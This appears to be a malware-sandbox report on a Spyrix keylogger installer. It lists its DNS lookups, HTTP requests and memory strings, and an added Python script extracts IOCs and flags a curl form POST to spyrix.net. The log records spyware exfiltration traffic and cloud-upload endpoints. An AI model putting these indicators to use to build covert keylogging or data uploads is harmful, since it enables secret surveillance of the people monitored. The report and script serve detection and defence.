Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: qrl.exe String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)
Source: global traffic DNS traffic detected: DNS query: filedn.com
Source: global traffic DNS traffic detected: DNS query: cdnbaynet.com
Source: global traffic DNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
Source: global traffic DNS traffic detected: DNS query: dashboard.spyrix.com
Source: global traffic DNS traffic detected: DNS query: spyrix.net
Source: global traffic DNS traffic detected: DNS query: cdn.cdndownload.net
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1
  Host: spyrix.net
  User-Agent: curl/7.64.0
  Accept: */*
  Content-Length: 426
  Content-Type: application/x-www-form-urlencoded
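The network evidence above mixes ordinary browser asset loads (Chrome user agent, Sec-Fetch-* headers, Referer from dashboard.spyrix.com) with one request a browser did not make: a form POST to spyrix.net/dashboard/prg-actions with User-Agent curl/7.64.0, which matches the curl usage banner later found in the memory of qrl.exe. The script below is an added example, not part of the sandbox report: it re-splits the exported entries (the sandbox runs request line and headers together with no separator), collects DNS names and URLs as IOCs, and flags requests whose client is not a browser or that POST form data. The sample lines are copied verbatim from this report; the header list used for splitting is an assumption that covers only the headers seen on this page.

```python
"""Turn sandbox network-evidence lines into an IOC summary and flag
non-browser clients. Added example, not code from the sandbox vendor."""
import re
from collections import Counter

# Constructed sample: six evidence lines copied verbatim from the report.
SAMPLE = [
    'Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9',
    'Source: global traffic HTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9',
    'Source: unknown HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 426Content-Type: application/x-www-form-urlencoded',
    'Source: global traffic DNS traffic detected: DNS query: spyrix.net',
    'Source: global traffic DNS traffic detected: DNS query: cdn.cdndownload.net',
    'Source: global traffic DNS traffic detected: DNS query: dashboard.spyrix.com',
]

# Assumed header list: only the names seen in this report. Longest names
# first so that "Accept" can never swallow "Accept-Encoding".
HEADER_NAMES = sorted(
    ["Host", "Connection", "sec-ch-ua", "sec-ch-ua-mobile", "sec-ch-ua-platform",
     "Origin", "User-Agent", "Accept", "Accept-Encoding", "Accept-Language",
     "Sec-Fetch-Site", "Sec-Fetch-Mode", "Sec-Fetch-Dest", "Referer",
     "Content-Length", "Content-Type"],
    key=len, reverse=True)
# Zero-width split point immediately before "<Header-Name>: ".
_SPLIT = re.compile(r"(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES)))
_HTTP = re.compile(r"^Source: (?P<src>.+?) HTTP traffic detected: (?P<req>.+)$")
_DNS = re.compile(r"^Source: .+? DNS traffic detected: DNS query: (?P<name>\S+)$")
_REQLINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/(?P<ver>[\d.]+)$")


def parse_http(line):
    """Split one exported HTTP entry into method, path and a header dict."""
    m = _HTTP.match(line)
    if not m:
        return None
    parts = [p for p in _SPLIT.split(m.group("req")) if p]
    r = _REQLINE.match(parts[0])
    if not r:
        return None
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name.lower()] = value
    return {"source": m.group("src"), "method": r.group("method"),
            "path": r.group("path"), "version": r.group("ver"), "headers": headers}


def parse_dns(line):
    """Return the queried name from a DNS evidence line, else None."""
    m = _DNS.match(line)
    return m.group("name") if m else None


def extract_iocs(lines):
    """Collect DNS names, host+path URLs and user agents; flag requests a
    browser would not have made (non-Mozilla UA, form POSTs) and hosts
    contacted with no DNS query in the same capture."""
    dns, urls, hosts, uas, flagged = set(), set(), set(), Counter(), []
    for line in lines:
        name = parse_dns(line)
        if name:
            dns.add(name)
            continue
        req = parse_http(line)
        if not req:
            continue
        h = req["headers"]
        host = h.get("host", "?")
        hosts.add(host)
        urls.add(host + req["path"])
        ua = h.get("user-agent", "")
        uas[ua] += 1
        reasons = []
        if not ua.startswith("Mozilla/"):
            reasons.append("non-browser user agent %r" % ua)
        if req["method"] == "POST" and "form-urlencoded" in h.get("content-type", ""):
            reasons.append("form POST of %s bytes" % h.get("content-length", "?"))
        if reasons:
            flagged.append((req["method"], host + req["path"], "; ".join(reasons)))
    return {"dns": sorted(dns), "urls": sorted(urls), "user_agents": uas,
            "flagged": flagged, "hosts_without_dns": sorted(hosts - dns)}


if __name__ == "__main__":
    summary = extract_iocs(SAMPLE)
    for key in ("dns", "urls", "hosts_without_dns"):
        print(key, summary[key])
    for method, url, why in summary["flagged"]:
        print("FLAG", method, url, "->", why)
```

Run over the whole HTTP and DNS section rather than the six sample lines, the same code yields the full domain list for blocking and singles out the curl POST; the `hosts_without_dns` check is empty here because every contacted host was resolved in the capture, but a non-empty result would point at a hard-coded address.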
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
Source: spkl.exe, 00000038.00000002.2742570837.000000000456C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://.css
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://.jpg
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.certum.pl/ca.crl0:
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000008.00000002.2689351113.0000027405600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000008.00000003.1559425141.0000027405470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://filedn.com
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://filedn.comd
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://html4/loose.dtd
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://https://-.://%s%s%s/%s
Source: spkl.exe, 00000038.00000003.2422306843.00000000044E1000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000929000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 0000004D.00000000.2590049471.00000000005EA000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: http://neftali.clubdelphi.com/
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.certum.pl0.
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: is-2HD8H.tmp.22.dr, is-4EDJE.tmp.22.dr String found in binary or memory: http://schemas.mic
Source: is-VPREH.tmp.22.dr String found in binary or memory: http://schemas.micr
Source: is-NOU64.tmp.22.dr String found in binary or memory: http://schemas.microsof
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: spkl.exe String found in binary or memory: http://spyrix.com/manual.php
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://user.qzone.qq.com
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://vk.com/search
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A96000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vk.com/searchecp
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.actualkeylogger.com/buynow.html
Source: spkl.exe String found in binary or memory: http://www.actualkeylogger.com/help.html
Source: spkl.exe String found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.0000000001FB8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.dk-soft.org/
Source: spkl.exe, spkl.exe, 00000038.00000002.2673755823.0000000000863000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000038.00000002.2742570837.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spmm.exe, 0000004D.00000000.2580594653.0000000000401000.00000020.00000001.01000000.00000018.sdmp, spmm.exe, 0000004D.00000002.2678280868.00000000022B1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.indyproject.org/
Source: spkl.exe String found in binary or memory: http://www.indyproject.org/Original
Source: [space]= .exe, 00000013.00000003.1872221233.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.1871453618.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000000.1873347361.0000000000401000.00000020.00000001.01000000.0000000D.sdmp String found in binary or memory: http://www.innosetup.com/
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.jrsoftware.org/0
Source: [space]= .exe, 00000013.00000000.1870033970.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.myspace.com/my/mail
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.myspace.com/search/
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
Source: [space]= .exe, 00000013.00000003.1872221233.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.1871453618.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000000.1873347361.0000000000401000.00000020.00000001.01000000.0000000D.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.spyrix.com
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2457362812.0000000003432000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.spyrix.com/
Source: spkl.exe String found in binary or memory: http://www.spyrix.com/manual.php#registrate
Source: spkl.exe, 00000038.00000002.2691175840.00000000009EA000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2422306843.0000000004591000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp, is-SDGI4.tmp.22.dr, is-2HD8H.tmp.22.dr, is-4EDJE.tmp.22.dr String found in binary or memory: http://www.spyrix.com/purchase.php
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2454626435.0000000000775000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.spyrix.com/terms-of-use.php)
Source: spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.spyrix.net/ibann
Source: spmm.exe, 0000004D.00000002.2690989523.0000000061E9E000.00000008.00000001.01000000.00000015.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/files_put
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api-content.dropbox.com/1/files_put?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/account/info
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/account/info?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/delta
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/delta?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/copy
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/copy?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/delete
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/delete?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/move
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/fileops/move?
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
